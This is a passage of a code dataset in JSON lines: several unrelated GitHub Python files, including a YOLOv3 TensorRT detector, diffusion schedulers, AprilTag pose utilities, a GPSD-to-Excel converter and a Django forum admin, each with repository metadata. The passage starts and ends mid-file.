Parameters\n ----------\n model_filename: Filename for the trained model.\n\n Returns\n -------\n self\n \"\"\"\n for i in range(len(self.ASPECTS)):\n self.clf[i] = joblib.load(model_filename + str(i))\n return self\n\nif __name__ == '__main__':\n X, y = SentimentExtractor.read_data(\"../../data/sentiment_extractor/train_data.csv\")\n extractor = SentimentExtractor()\n extractor.cross_validate(X, y, 10)\n print()\n extractor.fit(X, y)\n extractor.evaluate(\"../../data/sentiment_extractor/test_data.csv\")\n extractor.save_model(\"../../model/sentiment_extractor.mdl\")\n extractor.load_model(\"../../model/sentiment_extractor.mdl\")\n # print(extractor.predict([{'sentence': 'Good location', 'aspects': ['location']}, {'sentence': 'Love the food here', 'aspects': ['food/drinks']}]))\n","repo_name":"wennyyustalim/absa-learning-model","sub_path":"absa/app/sentiment_extractor/sentiment_extractor.py","file_name":"sentiment_extractor.py","file_ext":"py","file_size_in_byte":7011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"19003864899","text":"import codecs;\nusrt={};\nusrc={};\nusrl={};\nusraptme={};\nusr=[];\ngo=[];\nwith open('fork.txt') as f:\n\tfor line in f:\n\t\tline=line.replace('\\n',''); # VERY IMPORTANT !!!\n\t\tif line != '': #avoid empty l n e\n\t\t\tusraptme[line]=0;\n\t\t\tusr.append(line);\n\t\t\tusrt[line]=0;\n\t\t\tusrc[line]=0;\n\t\t\tusrl[line]=0;\n#bld fork usr lst\nprint('finish loading');\n#print(usr);\ni=1;\nwith open('train.txt') as f:\n\tfor line in f:\n\t\tif line != '':\n\t\t\tname= line.split('\\t')[0];\n\t\t\tif name in usr:\n\t\t\t\tprint('find '+str(i));\n\t\t\t\ti=i+1;\n\t\t\t\tusraptme[name]=usraptme[name]+1; #add\n\t\t\t\tsplit=line.split('\\t');\n\t\t\t\tusrt[name]=int(usrt[name])+int(split[3]);\n\t\t\t\tusrc[name]=int(usrc[name])+int(split[4]);\n\t\t\t\tusrl[name]=int(usrl[name])+int(split[5]);\ncount=1;\nfor user in usr:\n\tif (int(usrt[user])/int(usraptme[user])) < 2:\n\t\tif (int(usrc[user])/int(usraptme[user])) < 2:\n\t\t\tif (int(usrl[user])/int(usraptme[user])) < 2:\n\t\t\t\tprint(count);\n\t\t\t\tcount=count+1;\n\t\t\t\tgo.append(user);\nwith codecs.open('rubbishuser.txt','a','utf8') as c:\n\tfor goal in go:\n\t\tc.write(goal+'\\n');\n#by DGideas\n","repo_name":"LabsCluster/WeiboPredict","sub_path":"findrubbishusr.py","file_name":"findrubbishusr.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"84"} +{"seq_id":"31524241407","text":"from django.contrib import admin\n\nfrom .models import Section, Subsection, Thread, Post\n\nclass SubsectionInline(admin.TabularInline):\n model = Subsection\n\nclass SectionAdmin(admin.ModelAdmin):\n inlines = [SubsectionInline]\n\nclass ThreadInline(admin.TabularInline):\n model = Thread\n\nclass SubsectionAdmin(admin.ModelAdmin):\n inlines = [ThreadInline]\n\nclass PostInline(admin.TabularInline):\n model = Post\n\nclass ThreadAdmin(admin.ModelAdmin):\n inlines = [PostInline]\n\n def save_model(self, request, obj, form, *args, **kwargs):\n return\n def save_formset(self, request, form, formset, change):\n #print(dir(formset), form, formset.forms, \"FORMSET\")\n form_data = cleanup_attribs(form.data)\n\n if formset.is_valid():\n data = cleanup_attribs(formset.data)\n posts = []\n def try_int(x):\n try:\n return int(x)\n except ValueError:\n return float(\"inf\")\n keys = sorted(list(data.keys()), key=lambda x: try_int(x))\n for key in keys:\n try:\n int(key)\n except ValueError:\n continue\n \n posts.append(Post.prepare(title=data[key][\"title\"],\n text=data[key][\"text\"],\n author=data[key][\"author\"],\n #data[key][\"post_date\"]\n post_date=timezone.now()))\n thread = Thread.create(post=posts[0], **form_data)\n\n thread.save()\n for post in posts[1:]:\n try:\n post(thread).full_clean()\n post(thread).save()\n except ValueError:\n pass\n\nadmin.site.register(Post)\nadmin.site.register(Section, SectionAdmin)\nadmin.site.register(Subsection, SubsectionAdmin)\nadmin.site.register(Thread, ThreadAdmin)\n \n","repo_name":"marky1991/galcon_clone","sub_path":"galcon/forums/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"43956318422","text":"# \r\n# deuxiéme séance\r\n# \r\n#\r\n# fixation des valeurs :\r\nk1, k2 = 0.1, 0.05\r\nt0, tmax, Dt =0, 10, 0.05\r\ni = 0\r\nB0, Bi, C0, Ci = 0, 0, 0, 0\r\n\r\n#le choix de [A]\r\nA0 = float(input('Choisir la valeur de [A]0: '))\r\n\r\n#initialisation\r\nAi = A0\r\nti = t0\r\n\r\n# boucle RK4\r\nwhile ti <= tmax:\r\n print('t = %3.3f s - [A]%3.f = %3.3f mol/L - [B]%3.f = %3.3f mol/L - [C]%3.f = %3.3f mol./L' %(ti, i, Ai, i, Bi, i, Ci))\r\n\r\n #calculation des quantités intermidiaires pour A\r\n AS1 = Dt * (- k1 * Ai)\r\n AS2 = Dt * (- k1 * (Ai + 1/2*AS1))\r\n AS3 = Dt * (- k1 * (Ai + 1/2*AS2))\r\n AS4 = Dt * (- k1 * (Ai + AS3))\r\n\r\n #calculation des quantités intermidiaires pour B\r\n BS1 = Dt * (k1 * Ai - k2 * Bi)\r\n BS2 = Dt * (k1 * (Ai + 1/2*AS2) - k2 * (Bi + 1/2 * BS1))\r\n BS3 = Dt * (k1 * (Ai + 1/2*AS2) - k2 * (Bi + 1/2 * BS2))\r\n BS4 = Dt * (k1 * (Ai + 1/2*AS3) - k2 * (Bi + 1/2 * BS3))\r\n\r\n #Claculation de [A]i+1, [B]i+1 et [C]i+1 en utilisant les meme variable Ai, Bi et Ci\r\n Ai = Ai + 1/6 * (AS1 + 2 * AS2 + 2 * AS3 + AS4)\r\n Bi = Bi + 1/6 * (BS1 + 2 * BS2 + 2 * BS3 + BS4)\r\n Ci = A0 + B0 + C0 - Ai - Bi\r\n\r\n # incrementation de i\r\n i = i + 1\r\n ti = t0 + i * Dt\r\n","repo_name":"MdAMALLAL/rk4","sub_path":"2_deuxiem_seance.py","file_name":"2_deuxiem_seance.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"12201791182","text":"# imports\nimport os\nimport logging\nimport sys\n\nlogging_str = \"[%(asctime)s : %(levelname)s : %(module)s : %(message)s]\"\n\n# create the log file\nlog_dir = \"logs\"\nlog_filepath = os.path.join(log_dir,\"runnning_logs.log\")\nos.makedirs(log_dir,exist_ok=True)\n\nlogging.basicConfig(\n level = logging.INFO,\n format=logging_str,\n handlers=[\n logging.FileHandler(log_filepath), # to log in a file\n logging.StreamHandler(sys.stdout) # to show it in a terminal\n ]\n)\n\nlogger = logging.getLogger(\"textSummaryLogger\")","repo_name":"JaiSuryaPrabu/text-summary-mlops","sub_path":"src/text_summary/logging/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"14299835162","text":" \nimport numpy as np\nimport random\n\nfrom networks.developmental_network import *\n\nnp.random.seed(1993)\nrandom.seed(1993)\ntorch.cuda.manual_seed_all(1993)\ntorch.manual_seed(1993)\n\ndef create_layers(config):\n \"\"\"Create weight and bias tensors for the different layers\n\n Args:\n config: The config.\n\n Returns:\n (....): Tuple containing:\n\n - **W**: list of length of layers-1 with weights for layer l+1 to l.\n - **b**: list of length of layers-1 with biases of layer l+1.\n \"\"\"\n W = []\n b = []\n for l in range(len(config['N']) - 1):\n W_new = torch.randn((config['N'][l], config['N'][l+1]), \n device=config['device'], \n dtype=config['dtype'])\n nn.init.kaiming_uniform_(W_new, a=np.sqrt(5))\n W.append(W_new)\n\n b_new = torch.randn(config['N'][l+1], \n device=config['device'], \n dtype=config['dtype'])\n bound = 1./np.sqrt(config['N'][l+1])\n nn.init.uniform_(b_new, -bound, +bound)\n b.append(b_new)\n return (W, b)\n\n\ndef sample_data(M, W, b, config, alphas):\n \"\"\"Sample data from the weights and biases of the teacher.\n\n Args: \n M: number of desired samples\n W: list of weights of the teacher\n b: list of biases of the teacher\n alphas: list of alpha values in layer l+1 of the teacher.\n\n Returns: \n x: tensor of dataset inputs (M x config['N'][0])\n y: tensor of dataset outputs (M x config['N'][-1].\n \"\"\"\n x = torch.randn((M, config['N'][0]), device=config['device'], \n dtype=config['dtype'])\n h = x\n for l in range(len(config['N']) - 1):\n z = torch.matmul(h, W[l]) + b[l]\n h = nn.functional.leaky_relu(z, negative_slope=alphas[l])\n y = h\n\n return x, y\n\ndef create_dataloader(x, y, B=100):\n \"\"\"Split x and y tensors into batches of size B and return dataloader.\n\n Args:\n x: The inputs.\n y: The targets.\n B (int): The batch size.\n\n Returns:\n out: list (dataloader) with pairs of inputs-output batches.\n \"\"\"\n out = []\n batches = np.floor(np.shape(x)[0]/B).astype(int)\n for i in range(batches):\n out.append([x[i*B:(i+1)*B,:], y[i*B:(i+1)*B]])\n\n return out\n\ndef generate_data(config, alphas=None):\n \"\"\"Create training and evaluation dataloaders from a random teacher.\n\n Args:\n alphas: list of the negative slope of units in each hidden layer.\n\n Returns: \n train_dl: training dataloader set\n valid_dl: validation dataloader set.\n \"\"\"\n\n # Generate default alphas vector or check input alphas vector\n if alphas == None:\n alphas = [0. for i in range(len(config['N'])-2)]\n if not(len(alphas) + 2 == len(config['N'])):\n raise ValueError('The size of alphas vector is not suitable.')\n alphas.append(1) # output linear layer\n\n W, b = create_layers(config)\n\n # Create training set\n x, y = sample_data(config['M'], W, b, config, alphas)\n train_dl = create_dataloader(x, y, B=config['B'])\n\n # Create validation set\n x, y = sample_data(config['MV'], W, b, config, alphas)\n valid_dl = create_dataloader(x, y, B=config['T'])\n\n return train_dl, valid_dl \n\n\nif __name__=='__main__':\n\n config = {'N':[30, 20, 10],\n 'B':100, # train batch size\n 'T':1000, # test batch size\n 'M':60000, # samples for training\n 'MV':10000, # samples for validation\n 'epochs':5, \n 'w_lr':0.05,\n 'a_lr': 0., \n 'device':torch.device('cuda:0'),\n 'dtype': torch.float,\n 'optim_func':optim.SGD,\n 'loss_func':nn.MSELoss(),\n 'bias':True,\n 'plot':False,\n 'gidx':1, # layer index for growth\n 'mutation_period':2,\n 'input_reshape':(lambda x:x),\n 'grow_v':False,\n 'grow_h':False,\n 'h_gidx':1, # layer index for growth\n 'v_gidx':1, # layer index for growth\n 'instances':1} # frequency to grow\n\n t_dl, v_dl = generate_data(config)\n\n loss = np.zeros((config['epochs'], config['instances']))\n alpha = [[] for i in range(config['instances'])]\n\n for i in range(config['instances']):\n print('\\nRunning instance %d/%d'%(i+1, config['instances']))\n _, loss[:,i], _, alpha[i] = run_network(config, t_dl, v_dl)\n\n plot_results(loss, _, alpha, config)","repo_name":"mariacer/developmental_net","sub_path":"run_teacher_data.py","file_name":"run_teacher_data.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"34522612166","text":"from sleeper_wrapper import Stats, Players\nimport pandas as pd\n\nclass StatsDF:\n \"\"\"\n Class to manage player stats for a specific season.\n \"\"\"\n def __init__(self, season_type: str = None, season_year: int = None):\n self.season_type = season_type\n self.season_year = season_year\n self.stats = Stats()\n self.players = Players()\n self.players_df = None # This will store the DataFrame with players\n self.stats_df = None # This will store the DataFrame with stats\n self.all_stats = None # This will store the merged DataFrame\n\n self.selected_columns = [\n 'search_full_name','player_id', 'team', 'fantasy_positions', 'years_exp',\n 'active','age','height','weight','depth_chart_order'\n ]\n\n if season_year is not None and season_type is not None:\n self.refresh_stats()\n\n def refresh_stats(self):\n \"\"\"\n Get stats for the specified season type and year\n and assign the DataFrame with players.\n \"\"\"\n self.stats_df = self.stats.get_all_stats(self.season_type, self.season_year)\n self.stats_df = self.stats_df.T\n self.players_df = self.get_players_df()\n self.all_stats = self.merge_players_df()\n self.all_stats = self.make_column_first('search_full_name')\n\n def get_players_df(self) -> pd.DataFrame:\n \"\"\"\n Retrieve all players and filter selected columns.\n \"\"\"\n all_players = self.players.get_all_players()\n players_df = pd.DataFrame(all_players)\n players_df = players_df.T\n return players_df[self.selected_columns]\n\n def merge_players_df(self) -> pd.DataFrame:\n \"\"\"\n Merge player stats and details.\n \"\"\"\n return pd.merge(self.stats_df, self.players_df, how='outer', on='player_id')\n\n def get_stats_df(self) -> pd.DataFrame:\n \"\"\"\n Return the DataFrame with stats.\n \"\"\"\n return self.stats_df\n\n def display_stats_df(self) -> None:\n \"\"\"\n Display the first few rows of the DataFrame.\n \"\"\"\n print(self.all_stats.head())\n\n def make_column_first(self, col_name: str) -> pd.DataFrame:\n \"\"\"\n Move specified column to the first position and sort the DataFrame by column.\n \"\"\"\n col_to_move = self.all_stats.pop(col_name)\n self.all_stats.insert(0, col_name, col_to_move)\n return self.all_stats.sort_values(by=col_name, axis=0)\n","repo_name":"Curlyams/Fantasy_Fb_ML","sub_path":"fb_class.py","file_name":"fb_class.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"10204094959","text":"import numpy as np\nimport cv2\nimport math\nfrom scipy.optimize import fsolve\nss = 0.5\nsrc = np.array([[-ss, -ss, 0],\n [ss, -ss, 0],\n [ss, ss, 0],\n [-ss, ss, 0]])\n#500 is scale\nKmat = np.array([[700, 0, 0],\n [0, 700, 0],\n [0, 0, 1]]) * 1.0\ndisCoeffs= np.zeros([4, 1]) * 1.0\nedges = np.array([[0, 1],\n [1, 2],\n [2, 3],\n [3, 0]])\ndef project(H,point):\n x = point[0]\n y = point[1]\n z = H[2,0]*x +H[2,1]*y+H[2,2]\n\n point[0] = (H[0,0]*x+H[0,1]*y+H[0,2])/z*1.0\n point[1] = (H[1, 0]*x+H[1, 1] *y + H[1, 2]) / z*1.0\n return point\n\ndef project_array(H):\n ipoints = np.array([[-1,-1],\n [1,-1],\n [1,1],\n [-1,1]])\n for point in ipoints:\n point = project(H,point)\n\n return ipoints\n\ndef sovle_coord(R1,R2,R3,edge = 1060):\n x = -(R2*R2 - R1*R1 - edge**2) / (2.0*edge)\n y = -(R3*R3 - R1*R1 - edge**2) / (2.0*edge)\n z = (np.sqrt(R1*R1 - x * x - y * y))-edge\n return x,y,z\n\n\ndef verify_z(x,y,R4,edge = 1060):\n x = edge - x\n y = edge - y\n rand2 = x**2+y**2\n h = np.sqrt(R4**2 - rand2)\n return edge - h\n\n\ndef get_Kmat(H):\n campoint = project_array(H)*1.0\n opoints = np.array([[-1.0, -1.0, 0.0],\n [1.0, -1.0, 0.0],\n [1.0, 1.0, 0.0],\n [-1.0, 1.0, 0.0]])\n opoints = opoints*0.5\n rate, rvec, tvec = cv2.solvePnP(opoints, campoint, Kmat, disCoeffs)\n return rvec,tvec\n\ndef get_pose_point(H):\n \"\"\"\n 将空间坐标转换成相机坐标\n Trans the point to camera point\n :param H: homography\n :return:point\n \"\"\"\n rvec, tvec = get_Kmat(H)\n point, jac = cv2.projectPoints(src, rvec, tvec, Kmat, disCoeffs)\n return np.int32(np.reshape(point,[4,2]))\n\ndef get_pose_point_noroate(H):\n \"\"\"\n 将空间坐标转换成相机坐标但是不旋转\n Trans the point to camera point but no rotating\n :param H: homography\n :return:point\n \"\"\"\n rvec, tvec = get_Kmat(H)\n point, jac = cv2.projectPoints(src, np.zeros(rvec.shape), tvec, Kmat, disCoeffs)\n return np.int32(np.reshape(point,[4,2]))\n\ndef average_dis(point,k):\n return np.abs( k/np.linalg.norm(point[0] - point[1]))\ndef average_pixel(point):\n return np.abs( np.linalg.norm(point[0] - point[1]))\ndef get_distance(H,t):\n points = get_pose_point_noroate(H)\n return average_dis(points,t)\ndef get_min_distance(array_detections,t):\n min = 65535;\n for detection in array_detections:\n #print(detection.id)\n dis = get_distance(detection.homography,t)\n if dis < min:\n min = dis\n return min;\n\ndef get_pixel(H):\n points = get_pose_point_noroate(H)\n return average_pixel(points)\n\n","repo_name":"BlackJocker1995/Apriltag_python","sub_path":"tagUtils.py","file_name":"tagUtils.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"84"} +{"seq_id":"25699640904","text":"import os\nfrom dotenv import load_dotenv\n\nload_dotenv()\napi_id = os.getenv('api_id')\napi_hash = os.getenv('api_hash')\n\ncommand_prefixes = ['.','!','/']\n\na = 0\n\nghoul_table_command = 'ghoul-c'\n\nend_message = 'l l let me die' # Сообщение после конца цикла, если не нужно - оставляем пустым\nmessages_per_second = 7 # Для ghoul_spam\nsleep_time_ghoul = 0.1 ","repo_name":"DragonsCode/userbot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"1465156437","text":"import argparse\nimport os\nfrom os.path import isfile, join\nimport random\nimport tempfile\nimport time\nimport copy\nimport multiprocessing\nimport subprocess\nimport shutil\nimport cv2\n\n\nimport numpy as np\nimport tensorrt as trt\nimport pycuda.driver as cuda\nimport pycuda.autoinit\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n\n\nfrom PIL import Image, ImageDraw\nimport torchvision\n\nfrom model import trtYOLO\nfrom utils.utils import draw_bboxes,calculate_padding\n\n\n\n\ndef load_label_categories(label_file_path):\n categories = [line.rstrip('\\n') for line in open(label_file_path)]\n return categories\n\nLABEL_FILE_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'coco_labels.txt')\nALL_CATEGORIES = load_label_categories(LABEL_FILE_PATH)\n\ndef main(target_path,engine_file,cfg_file,cam_device = 0,vanilla_anchor = True,mode = 'image'):\n \n trt_model = trtYOLO(cfg_file,engine_file,vanilla_anchor=True)\n\n if target_path == None:\n mode = 'video'\n \n print(\"detect mode is:\",mode)\n if mode == 'image':\n detect_single_img(target_path,trt_model)\n elif mode == 'video':\n detect_video(trt_model,cam_device)\n else:\n print(\"target path error\")\n\ndef detect_single_img(target_path,trt_model):\n img = cv2.imread(target_path)\n (boxes,clss,clss_prob) = trt_model.detect_frame(img)\n for box,clss_i,cls_prob in zip(boxes,clss,clss_prob):\n print(ALL_CATEGORIES[clss_i],\" conf:\",cls_prob,box)\n img_with_boxes = draw_bboxes(img,boxes,clss,clss_prob,ALL_CATEGORIES)\n cv2.imwrite(target_path.split('/')[-1],img_with_boxes)\n\n\ndef detect_video(trt_model,cam_device = 0):\n cap = cv2.VideoCapture(cam_device) # 打开摄像头\n cap.set(cv2.CAP_PROP_FRAME_WIDTH,1280)\n cap.set(cv2.CAP_PROP_FRAME_HEIGHT,720)\n\n while True:\n print(\"-----------------------------\")\n t_time1 = time.time()\n return_value, frame = cap.read() \n if return_value is False:\n print(\"[error]open camera fail !\")\n exit()\n t_time2 = time.time()\n print(\"[Time]get frame time :\",(t_time2-t_time1))\n\n # trt_model.detect_path('data/dog.jpg')\n (boxes,clss,clss_prob) = trt_model.detect_frame(frame)\n if boxes is None:\n img_with_boxes = frame\n else:\n for box,clss_i,cls_prob in zip(boxes,clss,clss_prob):\n print(ALL_CATEGORIES[clss_i],\" conf:\",cls_prob,box)\n img_with_boxes = draw_bboxes(frame,boxes,clss,clss_prob,ALL_CATEGORIES)\n cv2.imshow(\"img_with_boxes\",img_with_boxes)\n t_time3 = time.time()\n print(\"[Time]detect time:\",(t_time3-t_time2))\n if cv2.waitKey(1) & 0xFF == ord('z'): # 按q退出\n break\n \n print(\"[Time]total time: \",(t_time3-t_time1))\n #cv2.imshow(\"frame\",frame)\n print(\"FPS: \",1./(t_time3- t_time1))\n \n cap.release() \n cv2.destroyAllWindows() \n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n def add_bool_arg(name, default, help):\n arg_group = parser.add_mutually_exclusive_group(required=False)\n arg_group.add_argument('--' + name, dest=name, action='store_true', help=help)\n arg_group.add_argument('--no_' + name, dest=name, action='store_false', help=(\"Do not \" + help))\n parser.set_defaults(**{name:default})\n parser.add_argument('--cfg_path', type=str, default='model_cfg/yolov3-608.cfg')\n parser.add_argument('--target_path', type=str,default='data/dog.jpg', help='path to target image/video')\n parser.add_argument('--engine_file',type=str,default='yolov3-608.trt',help='path to tensortRT engine file')\n parser.add_argument('--mode',type=str,default='image',help='detect: image or video')\n parser.add_argument('--camera_device',type=int,default=0,help='code of camera device')\n\n add_bool_arg('vanilla_anchor', default=True)\n\n opt = parser.parse_args()\n\n main(cfg_file=opt.cfg_path,\n target_path=opt.target_path,\n engine_file=opt.engine_file,\n cam_device=opt.camera_device,\n mode=opt.mode,\n vanilla_anchor = True)\n ","repo_name":"sylarchen1389/tensorrt_yolov3","sub_path":"detecct.py","file_name":"detecct.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"73073823313","text":"\"\"\"Schedulers for Denoising Diffusion Probabilistic Models\"\"\"\n\nimport math\n\nimport numpy as np\nimport torch\n\nclass CategoricalDiffusion(object):\n def __init__(self, T, schedule):\n # Diffusion steps\n self.T = T\n\n # Noise schedule\n if schedule == 'linear':\n b0 = 1e-4\n bT = 2e-2\n self.beta = np.linspace(b0, bT, T)\n elif schedule == 'cosine':\n self.alphabar = self.__cos_noise(np.arange(0, T + 1, 1)) / self.__cos_noise(\n 0) # Generate an extra alpha for bT\n self.beta = np.clip(1 - (self.alphabar[1:] / self.alphabar[:-1]), None, 0.999)\n\n beta = self.beta.reshape((-1, 1, 1))\n eye = np.eye(2).reshape((1, 2, 2))\n ones = np.ones((2, 2)).reshape((1, 2, 2))\n\n self.Qs = (1 - beta) * eye + (beta / 2) * ones\n\n Q_bar = [np.eye(2)]\n for Q in self.Qs:\n Q_bar.append(Q_bar[-1] @ Q)\n self.Q_bar = np.stack(Q_bar, axis=0)\n\n def __cos_noise(self, t):\n offset = 0.008\n return np.cos(math.pi * 0.5 * (t / self.T + offset) / (1 + offset)) ** 2\n\n def sample(self, x0_onehot, t):\n # Select noise scales\n Q_bar = torch.from_numpy(self.Q_bar[t]).float().to(x0_onehot.device)\n xt = torch.matmul(x0_onehot, Q_bar.reshape((Q_bar.shape[0], 1, 2, 2)))\n return torch.bernoulli(xt[..., 1].clamp(0, 1))\n\n\nclass InferenceSchedule(object):\n def __init__(self, inference_schedule=\"linear\", T=1000, inference_T=1000):\n self.inference_schedule = inference_schedule\n self.T = T\n self.inference_T = inference_T\n\n def __call__(self, i):\n assert 0 <= i < self.inference_T\n\n if self.inference_schedule == \"linear\":\n t1 = self.T - int((float(i) / self.inference_T) * self.T)\n t1 = np.clip(t1, 1, self.T)\n\n t2 = self.T - int((float(i + 1) / self.inference_T) * self.T)\n t2 = np.clip(t2, 0, self.T - 1)\n return t1, t2\n elif self.inference_schedule == \"cosine\":\n t1 = self.T - int(\n np.sin((float(i) / self.inference_T) * np.pi / 2) * self.T)\n t1 = np.clip(t1, 1, self.T)\n\n t2 = self.T - int(\n np.sin((float(i + 1) / self.inference_T) * np.pi / 2) * self.T)\n t2 = np.clip(t2, 0, self.T - 1)\n return t1, t2\n else:\n raise ValueError(\"Unknown inference schedule: {}\".format(self.inference_schedule))\n","repo_name":"Thinklab-SJTU/T2TCO","sub_path":"diffusion/utils/diffusion_schedulers.py","file_name":"diffusion_schedulers.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"84"} +{"seq_id":"18527194282","text":"#!/usr/bin/env python3\n#\n# gpsdjson2xlsx -- format GPSD JSON satellite information\n# into human-readable Excel table\n#\n# Written by Tak Yanagida\n#\n# This file is licensed under CC0.\n# https://creativecommons.org/publicdomain/zero/1.0/\n\nimport sys\nimport argparse\nimport json\nimport xlsxwriter\n\nparser = argparse.ArgumentParser()\nparser.add_argument('input', type=argparse.FileType(), nargs='?', default=sys.stdin)\nparser.add_argument('output', nargs='?', default='out.xlsx')\nargs = parser.parse_args()\n\nworkbook = xlsxwriter.Workbook(args.output)\nworksheet = workbook.add_worksheet()\nused_style = workbook.add_format({'bg_color': '#80ff80'})\nnotused_style = workbook.add_format({'bg_color': 'gray'})\n\nmsgs = []\n\nfor line in args.input:\n msg = json.loads(line)\n msgs.append(msg)\n\nsatellites = set()\nfor msg in msgs:\n if (msg['class'] != \"SKY\"):\n continue\n for sat in msg['satellites']:\n satellites.add(sat['PRN'])\n\nfields = sorted(list(satellites))\nrow = 0\ncolumn = 0\nfor field in fields:\n worksheet.write(row, column, field)\n column += 1\n\nrow = 1\ncolumn = 0\nfor msg in msgs:\n snr = {}\n if (msg['class'] != \"SKY\"):\n continue\n for sat in msg['satellites']:\n column = fields.index(sat['PRN'])\n if (sat['used'] == True):\n worksheet.write(row, column, sat['ss'], used_style)\n elif (sat['used'] == False):\n worksheet.write(row, column, sat['ss'], notused_style)\n else:\n worksheet.write(row, column, sat['ss'])\n row += 1\n \nworkbook.close()\n","repo_name":"takyanagida/gpsdjson2xlsx","sub_path":"gpsdjson2xlsx.py","file_name":"gpsdjson2xlsx.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"32618353025","text":"import math\nfrom datetime import datetime\nfrom sqlalchemy.dialects.postgresql import array_agg\n\nfrom sqlalchemy.sql import func, desc\nfrom app import db\nfrom .tag import OffersTags\nfrom .sharer_rating import SharerRating\nfrom .user import User\n\n\nclass Offer(db.Model):\n __tablename__ = \"offer\"\n\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id')) # Many orders from one user\n name = db.Column('name', db.String(255),\n nullable=False)\n active = db.Column('active', db.Boolean, nullable=False)\n description = db.Column('description', db.Text, nullable=True)\n photo = db.Column('photo', db.String(255), nullable=True)\n portions_number = db.Column('portions_number', db.Integer, nullable=False)\n pickup_longitude = db.Column('pickup_longitude', db.Float, nullable=False)\n pickup_latitude = db.Column('pickup_latitude', db.Float, nullable=False)\n post_time = db.Column('post_time', db.DateTime, nullable=False, default=func.now)\n pickup_times = db.Column('pickup_times', db.String(255), nullable=False)\n offer_expiry = db.Column('offer_expiry', db.DateTime, nullable=False)\n\n orders = db.relationship('Orders', backref='offers_orders',\n foreign_keys='Orders.offer_id') # One offer to many Orders\n\n tags = db.relationship('OffersTags', back_populates='offer')\n\n chat_rooms = db.relationship('ChatRoom', backref='offer_chat_rooms',\n foreign_keys='ChatRoom.offer_id') # One offer to many Messages\n\n def to_dict(self):\n data = {\n 'id': self.id,\n 'user_id': self.user.id,\n 'user_name': self.user.name,\n 'user_surname': self.user.surname,\n 'user_rating': SharerRating.get_user_rating_aggregated(self.user.id),\n 'name': self.name,\n 'active': self.active,\n \"description\": self.description,\n \"photo\": self.photo,\n \"portions_number\": self.portions_number,\n \"used_portions\": sum([order.portions for order in self.orders if order.is_canceled == False]),\n \"pickup_latitude\": self.pickup_latitude,\n \"pickup_longitude\": self.pickup_longitude,\n \"post_time\": self.post_time,\n \"pickup_times\": self.pickup_times,\n \"offer_expiry\": self.offer_expiry,\n \"tags\": [offer_tag.tag.to_dict() for offer_tag in self.tags]\n }\n\n return data\n\n def to_search_dict(self):\n user_rating = SharerRating.get_user_rating_aggregated(self.user.id)\n data = {\n 'id': self.id,\n 'user_id': self.user.id,\n 'user_name': self.user.name,\n 'user_surname': self.user.surname,\n 'user_photo': self.user.profile_picture,\n 'user_rating': user_rating,\n 'name': self.name,\n 'active': self.active,\n \"description\": self.description,\n \"photo\": self.photo,\n \"portions_number\": self.portions_number,\n \"used_portions\": sum([order.portions for order in self.orders if order.is_canceled == False]),\n \"pickup_latitude\": self.pickup_latitude,\n \"pickup_longitude\": self.pickup_longitude,\n \"post_time\": self.post_time,\n \"pickup_times\": self.pickup_times,\n \"offer_expiry\": self.offer_expiry,\n \"tags\": [offer_tag.tag.tag_name for offer_tag in self.tags]\n }\n\n return data\n\n def to_chat_dict(self, user_id):\n user_rating = SharerRating.get_user_rating_aggregated(self.user.id)\n data = {\n \"is_my_offer\": self.user.id == user_id,\n 'id': self.id,\n 'user_id': self.user.id,\n 'user_username': self.user.username,\n 'user_name': self.user.name,\n 'user_surname': self.user.surname,\n 'user_photo': self.user.profile_picture,\n 'user_rating': user_rating,\n 'name': self.name,\n 'active': self.active,\n \"description\": self.description,\n \"photo\": self.photo,\n \"portions_number\": self.portions_number,\n \"used_portions\": sum([order.portions for order in self.orders if order.is_canceled == False]),\n \"pickup_latitude\": self.pickup_latitude,\n \"pickup_longitude\": self.pickup_longitude,\n \"post_time\": self.post_time,\n \"pickup_times\": self.pickup_times,\n \"offer_expiry\": self.offer_expiry,\n \"tags\": [offer_tag.tag.tag_name for offer_tag in self.tags]\n }\n\n return data\n\n\n @staticmethod\n def add_offer(user_id, name, active, portions_number, pickup_long, pickup_lat, post_time,\n pickup_times,\n offer_expiry, description=None, photo=None):\n offer = Offer(\n user_id=user_id,\n name=name,\n active=active,\n portions_number=portions_number,\n pickup_longitude=pickup_long,\n pickup_latitude=pickup_lat,\n post_time=post_time,\n pickup_times=pickup_times,\n offer_expiry=offer_expiry,\n description=description,\n photo=photo\n )\n db.session.add(offer)\n db.session.commit()\n return offer.id\n\n @staticmethod\n def update_offer(content, photo_url):\n offer = Offer.query.filter_by(id=content['id']).first()\n offer.name = content['name']\n offer.active = content['active']\n offer.portions_number = 